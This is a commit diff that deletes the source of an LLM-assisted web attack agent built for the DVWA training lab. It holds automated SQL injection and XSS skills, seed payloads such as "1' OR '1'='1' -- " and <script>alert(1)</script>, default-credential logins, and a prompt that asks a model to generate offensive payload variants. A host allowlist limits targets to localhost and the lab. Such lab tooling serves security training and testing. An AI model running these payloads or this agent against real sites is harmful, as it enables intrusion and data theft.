Delete src directory

This commit is contained in:
Joas A Santos
2025-12-18 18:10:04 -03:00
committed by GitHub
parent 66dd28cc60
commit cd904bad0b
47 changed files with 0 additions and 867 deletions

View File

Binary file not shown.

View File

View File

@@ -1,21 +0,0 @@
"""Minimal orchestrator that can call planner (GPT-5) to pick actions.
For MVP we call hardcoded skills; planner integration is available for future loops.
"""
from typing import Dict, Any, Callable
from . import planner
from ..skills import login, xss_reflected_low, sqli_low, xss_stored_low, xss_dom_low, xss_reflected_low_smart, sqli_low_smart
SKILLS: Dict[str, Callable[[str], Dict[str, Any]]] = {
"login": lambda base: login.run(base),
"xss_stored_low": lambda base: xss_stored_low.run(base),
"xss_reflected_low": lambda base: xss_reflected_low.run(base),
"xss_dom_low": lambda base: xss_dom_low.run(base),
"sqli_low": lambda base: sqli_low.run(base),
"sqli_low_smart": lambda base: sqli_low_smart.run(base),
"xss_reflected_low_smart": lambda base: xss_reflected_low_smart.run(base),
}
def run_skill(base_url: str, skill: str) -> Dict[str, Any]:
if skill not in SKILLS:
raise KeyError(f"Unknown skill: {skill}")
return SKILLS[skill](base_url)

View File

@@ -1,39 +0,0 @@
from typing import Dict, Any, List
from ..models import get_provider
_provider = get_provider()
def decide(context: dict) -> dict:
"""Mantém compat com o antigo: planejar uma ação simples."""
system = "You are a safe web security agent. Return STRICT JSON."
user = (
"Given this context, propose one next action as JSON:\n"
"{'tool':'navigate|fill_form|click|noop','target':'url|selector','data':null|{...},'why':'short'}\n\n"
f"Context:\n{context}"
)
res = _provider.complete_json(system, user)
if not isinstance(res, dict):
res = {"tool":"noop","target":"","data":None,"why":"fallback"}
return res
def propose_fuzz_payloads(category: str, page_context: dict, seeds: List[str], budget: int=8) -> List[str]:
"""Pede ao modelo variações de payload com base nos seeds e contexto da página."""
system = "You are an offensive security payload generator. Return STRICT JSON: {'payloads': [..]}."
user = (
f"Category: {category}\n"
f"Seeds: {seeds}\n"
f"Page context (inputs, hints, server msgs): {page_context}\n"
f"Generate up to {budget} diverse payloads. Focus on low-noise, high-signal candidates for DVWA Low.\n"
"Only return JSON: {'payloads': ['...','...']}."
)
res = _provider.complete_json(system, user)
pls = res.get("payloads", []) if isinstance(res, dict) else []
# sanity filter
uniq = []
for p in pls:
if not isinstance(p, str): continue
p = p.strip()
if p and p not in uniq and len(p) < 256:
uniq.append(p)
# fallback: se nada vier, retorne seeds
return uniq or seeds[:budget]

View File

@@ -1,26 +0,0 @@
import json, argparse
from .agent.orchestrator import run_skill
SUITE = [
("xss_reflected_low", {}),
("xss_stored_low", {}),
("sqli_low", {}),
# depois: ("command_injection_low", {}), ("csrf_low", {}), ("upload_low", {})
]
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--target', required=True)
args = ap.parse_args()
results = []
ok_count = 0
for skill, kwargs in SUITE:
res = run_skill(args.target, skill)
results.append((skill, res))
ok_count += 1 if res.get("ok") else 0
print(f"[{skill}] -> {'OK' if res.get('ok') else 'FAIL'}")
print(f"\nScore: {ok_count}/{len(SUITE)}")
print(json.dumps({k: v for k, v in results}, indent=2, ensure_ascii=False))
if __name__ == "__main__":
main()

View File

@@ -1,25 +0,0 @@
from pydantic import BaseModel
import os
class Settings(BaseModel):
# Provider: "openai", "ollama", "llamacpp"
model_provider: str = os.getenv("MODEL_PROVIDER", "openai").lower()
# OpenAI
openai_api_key: str = os.getenv("OPENAI_API_KEY", "")
openai_model: str = os.getenv("OPENAI_MODEL", "gpt-5")
# Ollama (LLaMA)
llama_base_url: str = os.getenv("LLAMA_BASE_URL", "http://localhost:11434")
llama_model: str = os.getenv("LLAMA_MODEL", "llama3.1") # ex: llama3.1, llama3.2:latest
# llama.cpp (local python)
llamacpp_model_path: str = os.getenv("LLAMACPP_MODEL_PATH", "")
llamacpp_n_threads: int = int(os.getenv("LLAMACPP_N_THREADS", "4"))
# Safety / target
allowlist_hosts: list[str] = [h.strip() for h in os.getenv("ALLOWLIST_HOSTS", "localhost,127.0.0.1,dvwa").split(",")]
dvwa_url_env: str = os.getenv("DVWA_URL", "").strip()
headless: bool = os.getenv("HEADLESS", "true").lower() == "true"
settings = Settings()

View File

@@ -1,13 +0,0 @@
import re
SQL_ERRORS = [
r"SQL syntax.*MySQL",
r"Warning: mysql_",
r"Unclosed quotation mark",
r"SQLSTATE\[HY000\]",
r"You have an error in your SQL syntax",
]
compiled = [re.compile(p, re.IGNORECASE) for p in SQL_ERRORS]
def has_sql_error(text: str) -> bool:
return any(c.search(text) for c in compiled)

View File

@@ -1,20 +0,0 @@
from typing import List, Dict, Any, Callable
from ..agent.planner import propose_fuzz_payloads
def generate_candidates(category: str, page_ctx: dict, seeds: List[str], budget: int=8) -> List[str]:
"""Combina seeds + LLM proposals."""
props = propose_fuzz_payloads(category, page_ctx, seeds, budget)
pool = list(dict.fromkeys(seeds + props)) # dedup preservando ordem
return pool[: max(budget, len(seeds))]
def try_candidates(try_func: Callable[[str], Dict[str, Any]], candidates: List[str]) -> Dict[str, Any]:
"""Executa candidatos até achar sucesso, retornando o melhor resultado."""
best = {"ok": False}
for p in candidates:
res = try_func(p)
if res.get("ok"):
return res
# guarda “quase bom” se tiver um reason/signal
if not best.get("ok") and len(res.get("evidence_excerpt","")) > len(best.get("evidence_excerpt","")):
best = res
return best

View File

@@ -1,19 +0,0 @@
SQLI_SEEDS = [
"1' OR '1'='1' -- ",
"' OR '1'='1' -- ",
"1' OR 1=1 -- ",
"1' OR '1'='1'#",
]
XSS_REFLECTED_SEEDS = [
'<script>alert("x")</script>',
'"><script>alert(1)</script>',
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>',
]
XSS_DOM_SEEDS = [
'<script>alert("domxss")</script>',
'"><script>alert(document.domain)</script>',
'<img src=x onerror=alert("dom")>',
]

View File

@@ -1 +0,0 @@
from .provider import get_provider

View File

@@ -1,144 +0,0 @@
from typing import Dict, Any, List
from ..config import settings
# OpenAI (novo SDK 1.x)
def _openai_client():
from openai import OpenAI
return OpenAI(api_key=settings.openai_api_key)
class BaseProvider:
def name(self) -> str: ...
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
"""Return parsed JSON (tool choice / payload proposals)."""
raise NotImplementedError
class OpenAIProvider(BaseProvider):
def name(self):
return "openai"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
"""
Tenta primeiro via Chat Completions com response_format JSON.
Se a versão do SDK/modelo não suportar, cai para texto puro + parse.
Por fim, tenta a Responses API sem response_format.
"""
import json, re
client = _openai_client()
# 1) Chat Completions com JSON (preferido)
try:
chat = client.chat.completions.create(
model=settings.openai_model,
messages=[
{"role": "system", "content": system},
{"role": "user", "content": user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
# algumas versões do SDK suportam isso; se não, cai no except
response_format={"type": "json_object"},
)
txt = chat.choices[0].message.content or "{}"
return json.loads(txt)
except Exception:
pass
# 2) Chat Completions sem response_format (parse heurístico)
try:
chat = client.chat.completions.create(
model=settings.openai_model,
messages=[
{"role": "system", "content": system},
{"role": "user", "content": user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
)
txt = chat.choices[0].message.content or "{}"
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
except Exception:
pass
# 3) Responses API (fallback), SEM response_format
try:
resp = client.responses.create(
model=settings.openai_model,
input=[
{"role":"system","content":system},
{"role":"user","content":user + "\nReturn STRICT JSON only."},
],
temperature=0.2,
top_p=0.9,
max_output_tokens=600,
)
# diferentes versões expõem campos distintos:
try:
txt = resp.output_text
except Exception:
# tente extrair do conteúdo estruturado
try:
blocks = resp.output
# concatena textos
txt = "".join([b.text if hasattr(b, "text") else "" for b in (blocks or [])]) or "{}"
except Exception:
txt = "{}"
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
except Exception:
# último fallback: dict vazio (engine usa seeds)
return {}
class OllamaProvider(BaseProvider):
def name(self): return "ollama"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
import requests, json
url = settings.llama_base_url.rstrip("/") + "/api/generate"
prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
r = requests.post(url, json={
"model": settings.llama_model,
"prompt": prompt,
"stream": False,
"options": {"temperature":0.2}
}, timeout=120)
r.raise_for_status()
txt = r.json().get("response","{}")
try:
return json.loads(txt)
except Exception:
# tentativa robusta: extrair bloco {...}
import re
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
class LlamaCppProvider(BaseProvider):
def name(self): return "llamacpp"
def complete_json(self, system: str, user: str) -> Dict[str, Any]:
# requer: pip install llama-cpp-python
from llama_cpp import Llama
import json, re, os
llm = Llama(model_path=settings.llamacpp_model_path, n_threads=settings.llamacpp_n_threads, verbose=False)
prompt = f"[SYSTEM]{system}\n[USER]{user}\nReturn STRICT JSON only."
out = llm(prompt=prompt, max_tokens=600, temperature=0.2)
txt = out["choices"][0]["text"]
try:
return json.loads(txt)
except Exception:
m = re.search(r"\{.*\}", txt, re.S)
return json.loads(m.group(0)) if m else {}
def get_provider() -> BaseProvider:
prov = settings.model_provider
if prov == "openai":
return OpenAIProvider()
if prov == "ollama":
return OllamaProvider()
if prov == "llamacpp":
return LlamaCppProvider()
return OpenAIProvider()

View File

@@ -1,46 +0,0 @@
from typing import Any, Dict
from openai import OpenAI
from .config import settings
client = OpenAI(api_key=settings.openai_api_key)
def plan_next_action(context: Dict[str, Any]) -> Dict[str, Any]:
"""Ask GPT-5 for the next action using structured JSON output (no chain-of-thought)."""
system = (
"You are a safe web security agent. "
"Only operate on the allowlisted lab host and return STRICT JSON with the next action."
)
user = (
"Given this context, propose one next action as a JSON object with keys: "
"{'tool': 'navigate|fill_form|click|type_and_submit|wait|noop', "
"'target': 'url or selector', 'data': 'payload or null', 'rationale': 'short'}."
"\nContext:\n" + str(context)
)
resp = client.responses.create(
model=settings.openai_model,
input=[
{"role":"system","content":system},
{"role":"user","content":user},
],
temperature=0.2,
top_p=0.9,
max_output_tokens=400,
response_format={ "type": "json_object" },
)
# For SDKs returning parsed JSON via output_parsed
try:
txt = resp.output_parsed
except Exception:
txt = None
if not txt:
try:
txt = resp.output_text
except Exception:
txt = "{}"
if isinstance(txt, dict):
return txt
import json
try:
return json.loads(txt)
except Exception:
return {"tool":"noop","target":"","data":None,"rationale":"fallback"}

View File

@@ -1,15 +0,0 @@
import argparse, json, os
from .config import settings
from .agent.orchestrator import run_skill
def main():
ap = argparse.ArgumentParser()
ap.add_argument('--target', required=False, default=settings.dvwa_url_env or "http://localhost:8080")
ap.add_argument('--skill', required=True, choices=['login','xss_reflected_low','sqli_low', 'xss_stored_low', 'xss_dom_low', 'sqli_low_smart', 'xss_reflected_low_smart'])
args = ap.parse_args()
result = run_skill(args.target, args.skill)
print(json.dumps(result, indent=2, ensure_ascii=False))
if __name__ == '__main__':
main()

View File

View File

@@ -1,12 +0,0 @@
from ..tools.browser import Browser
def run(base_url: str, username: str="admin", password: str="password") -> dict:
"""Login on DVWA (default creds)."""
with Browser(base_url) as b:
b.goto("/login.php")
b.fill('input[name="username"]', username)
b.fill('input[name="password"]', password)
b.click('input[type="submit"]')
body = b.text()
ok = "DVWA Security" in body or "Welcome" in body or "logout" in body.lower()
return {"ok": ok, "page": "home", "evidence": "contains DVWA after login" if ok else body[:500]}

View File

@@ -1,54 +0,0 @@
# agent/src/skills/sqli_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = "1' OR '1'='1' -- ") -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# security low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# ir para SQLi Low
b.goto("/vulnerabilities/sqli/")
b.page.wait_for_selector('input[name="id"]', timeout=15000)
# enviar payload
b.fill('input[name="id"]', payload)
b.click('input[type="submit"]')
b.page.wait_for_timeout(1200)
# salvar screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "sqli_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# analisar sucesso
html = b.content()
user_table_markers = ["First name", "Surname", "User ID", "Username"]
found = any(m in html for m in user_table_markers)
return {
"ok": found,
"vector": "SQLi (Low)",
"payload": payload,
"reason": "User table markers present" if found else "payload did not dump table",
"evidence_excerpt": html[:1200],
"screenshot": str(screenshot_path)
}

View File

@@ -1,68 +0,0 @@
from pathlib import Path
from urllib.parse import urlencode
from ..tools.browser import Browser
from ..detectors.sql_errors import has_sql_error
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import SQLI_SEEDS
def run(base_url: str, budget: int = 8) -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# best effort low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# baseline
b.goto("/vulnerabilities/sqli/?id=1&Submit=Submit")
b.page.wait_for_load_state("domcontentloaded")
base_html = b.content()
base_len = len(base_html)
def success_metrics(html: str):
if has_sql_error(html): return True, "SQL error pattern"
if ("First name" in html and "Surname" in html): return True, "User table markers"
if ("User ID" in html and "exists in the database" in html): return True, "Exists message"
if len(html) > base_len + 150: return True, "Delta size grew"
return False, ""
# gerar candidatos com LLM (contexto simples da página)
page_ctx = {"markers":["id input","Submit button"], "base_len": base_len}
candidates = generate_candidates("SQLiLow", page_ctx, SQLI_SEEDS, budget)
def try_one(p: str):
qs = urlencode({"id": p, "Submit": "Submit"})
b.goto(f"/vulnerabilities/sqli/?{qs}")
b.page.wait_for_load_state("domcontentloaded")
html = b.content()
ok, reason = success_metrics(html)
# screenshot
screens = Path(__file__).resolve().parents[2].parent / "screens"
screens.mkdir(parents=True, exist_ok=True)
shot = screens / "sqli_low_smart.png"
b.page.screenshot(path=str(shot), full_page=True)
return {
"ok": ok,
"vector": "SQLi (Low) SMART",
"payload": p,
"reason": reason,
"evidence_excerpt": html[:1200],
"screenshot": str(shot),
"url": b.page.url,
}
return try_candidates(try_one, candidates)

View File

@@ -1,93 +0,0 @@
# agent/src/skills/xss_dom_low.py
from pathlib import Path
from urllib.parse import urlencode
from ..tools.browser import Browser
# payloads comuns que funcionam no DVWA DOM XSS (param "default")
CANDIDATES = [
'<script>alert("domxss")</script>',
'"><script>alert(\'domxss\')</script>',
'<img src=x onerror=alert("domxss")>',
]
def run(base_url: str) -> dict:
with Browser(base_url) as b:
# 1) login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 2) tentar setar Security=Low (best-effort)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
if b.page.locator('input[name="seclev_submit"]').count() > 0:
b.click('input[name="seclev_submit"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# 3) hook para capturar alert()
alert = {"ok": False, "message": ""}
def on_dialog(d):
alert["ok"] = True
alert["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# 4) baseline: página “limpa”
b.goto("/vulnerabilities/xss_d/?default=English")
b.page.wait_for_selector("#main_menu", timeout=10000) # qualquer âncora estável
base_html = b.content()
# 5) tentar payloads via GET (?default=...)
for p in CANDIDATES:
qs = urlencode({"default": p})
b.goto(f"/vulnerabilities/xss_d/?{qs}")
b.page.wait_for_timeout(1200) # dá tempo do JS DOM executar
html = b.content()
raw_present = ("<script" in html and "alert(" in html) # às vezes aparece cru no DOM
if alert["ok"] or raw_present:
# screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_dom_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
return {
"ok": True,
"vector": "DOM XSS (Low)",
"payload": p,
"reason": (f'alert() fired: "{alert["message"]}"' if alert["ok"] else "raw <script> found"),
"evidence_contains": p if raw_present else html[:1200],
"screenshot": str(screenshot_path),
"url": b.page.url,
}
# 6) falhou salva screenshot para diagnóstico também
try:
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_dom_low_fail.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
except Exception:
screenshot_path = None
return {
"ok": False,
"vector": "DOM XSS (Low)",
"payload": CANDIDATES[-1],
"reason": "no alert and no raw script detected",
"evidence_contains": base_html[:1200],
"screenshot": str(screenshot_path) if screenshot_path else None,
"url": b.page.url,
}

View File

@@ -1,69 +0,0 @@
# agent/src/skills/xss_reflected_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = '<script>alert("reflected")</script>') -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# security = low (tentativa best-effort)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# ir para XSS Reflected
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
# hook p/ capturar alert()
alert_triggered = {"ok": False, "message": ""}
def on_dialog(d):
alert_triggered["ok"] = True
alert_triggered["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# enviar payload
b.fill('input[name="name"]', payload)
b.click('input[type="submit"]')
b.page.wait_for_timeout(1200)
# salvar screenshot
agent_dir = Path(__file__).resolve().parents[2]
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_reflected_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# analisar sucesso
html = b.content()
raw_present = "<script" in html and "alert(" in html
escaped_present = "&lt;script" in html or "&lt;script&gt;" in html
ok = alert_triggered["ok"] or raw_present
reason = (
f'alert() fired: "{alert_triggered["message"]}"' if alert_triggered["ok"]
else ("raw <script> in response" if raw_present
else ("payload escaped (provável nível > Low)" if escaped_present
else "payload não refletido"))
)
return {
"ok": ok,
"vector": "Reflected XSS (Low)",
"payload": payload,
"reason": reason,
"evidence_contains": (payload if raw_present else html[:1200]),
"screenshot": str(screenshot_path)
}

View File

@@ -1,68 +0,0 @@
from pathlib import Path
from ..tools.browser import Browser
from ..fuzz.engine import generate_candidates, try_candidates
from ..fuzz.seeds import XSS_REFLECTED_SEEDS
def run(base_url: str, budget: int=8) -> dict:
with Browser(base_url) as b:
# login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# low
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# hook de alert()
alert = {"ok": False, "message": ""}
def on_dialog(d):
alert["ok"] = True
alert["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# contexto e candidatos
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
page_ctx = {"form":"name", "page": "xss_reflected"}
candidates = generate_candidates("XSSReflectedLow", page_ctx, XSS_REFLECTED_SEEDS, budget)
def try_one(p: str):
b.goto("/vulnerabilities/xss_r/")
b.page.wait_for_selector('input[name="name"]', timeout=15000)
b.fill('input[name="name"]', p)
b.click('input[type="submit"]')
b.page.wait_for_timeout(900)
html = b.content()
raw_present = "<script" in html and "alert(" in html
ok = alert["ok"] or raw_present
reason = (f'alert fired: "{alert["message"]}"' if alert["ok"]
else "raw <script> present" if raw_present else "no execution")
screens = Path(__file__).resolve().parents[2].parent / "screens"
screens.mkdir(parents=True, exist_ok=True)
shot = screens / "xss_reflected_low_smart.png"
b.page.screenshot(path=str(shot), full_page=True)
return {
"ok": ok,
"vector": "Reflected XSS (Low) SMART",
"payload": p,
"reason": reason,
"evidence_contains": p if raw_present else html[:1000],
"screenshot": str(shot),
"url": b.page.url,
}
return try_candidates(try_one, candidates)

View File

@@ -1,83 +0,0 @@
# agent/src/skills/xss_stored_low.py
from ..tools.browser import Browser
from pathlib import Path
def run(base_url: str, payload: str = '<script>alert("stored")</script>') -> dict:
with Browser(base_url) as b:
# 1) login
b.goto("/login.php")
b.page.wait_for_selector('input[name="username"]', timeout=15000)
b.fill('input[name="username"]', "admin")
b.fill('input[name="password"]', "password")
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 2) best-effort: Security = Low (se a tela existir)
try:
b.goto("/security.php")
b.page.wait_for_selector('select[name="security"]', timeout=5000)
b.page.select_option('select[name="security"]', 'low')
if b.page.locator('input[name="seclev_submit"]').count() > 0:
b.click('input[name="seclev_submit"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
except Exception:
pass
# 3) ir para XSS Stored
b.goto("/vulnerabilities/xss_s/")
b.page.wait_for_selector('input[name="txtName"]', timeout=15000)
# 4) preencher
b.fill('input[name="txtName"]', "pwn")
b.fill('textarea[name="mtxMessage"]', payload)
# 5) hook para capturar o alert()
alert_triggered = {"ok": False, "message": ""}
def on_dialog(d):
alert_triggered["ok"] = True
alert_triggered["message"] = d.message
d.accept()
b.page.on("dialog", on_dialog)
# 6) enviar
if b.page.locator('input[name="btnSign"]').count() > 0:
b.click('input[name="btnSign"]')
else:
b.click('input[type="submit"]')
b.page.wait_for_load_state("domcontentloaded")
# 7) aguardar potencial execução do alert
b.page.wait_for_timeout(1200)
# 8) salvar screenshot (pasta screens/ ao lado do projeto)
# base_dir = .../agent -> queremos .../screens
agent_dir = Path(__file__).resolve().parents[2] # .../agent
screens_dir = agent_dir.parent / "screens"
screens_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = screens_dir / "xss_stored_low.png"
b.page.screenshot(path=str(screenshot_path), full_page=True)
# 9) avaliar sucesso: alert() capturado OU payload cru na página
html = b.content()
raw_present = "<script" in html and "alert(" in html
escaped_present = "&lt;script" in html or "&lt;script&gt;" in html
ok = alert_triggered["ok"] or raw_present
reason = (
f'alert() fired: "{alert_triggered["message"]}"' if alert_triggered["ok"]
else ("raw <script> found in page" if raw_present
else ("payload appears escaped (provável nível > Low)" if escaped_present
else "payload not present"))
)
return {
"ok": ok,
"vector": "Stored XSS (Low)",
"payload": payload,
"reason": reason,
"evidence_contains": (payload if raw_present else html[:1200]),
"screenshot": str(screenshot_path)
}

View File

View File

@@ -1,51 +0,0 @@
from playwright.sync_api import sync_playwright
from typing import Optional
from ..config import settings
from urllib.parse import urlparse
class Browser:
def __init__(self, base_url: str):
self.base_url = base_url.rstrip('/')
self._pw = None
self._browser = None
self._context = None
self.page = None
# safety: enforce allowlist
host = urlparse(self.base_url).hostname or ""
if host not in settings.allowlist_hosts:
raise RuntimeError(f"Target host '{host}' not in allowlist: {settings.allowlist_hosts}")
def __enter__(self):
self._pw = sync_playwright().start()
self._browser = self._pw.chromium.launch(headless=settings.headless)
self._context = self._browser.new_context(ignore_https_errors=True)
self.page = self._context.new_page()
return self
def __exit__(self, exc_type, exc, tb):
try:
if self._context: self._context.close()
if self._browser: self._browser.close()
finally:
if self._pw: self._pw.stop()
# helpers
def goto(self, path: str):
url = path if path.startswith("http") else f"{self.base_url}/{path.lstrip('/')}"
self.page.goto(url, wait_until="domcontentloaded")
def fill(self, selector: str, value: str):
self.page.fill(selector, value)
def click(self, selector: str):
self.page.click(selector)
def content(self) -> str:
return self.page.content()
def text(self) -> str:
return self.page.inner_text("body")
def screenshot(self, path: str):
self.page.screenshot(path=path, full_page=True)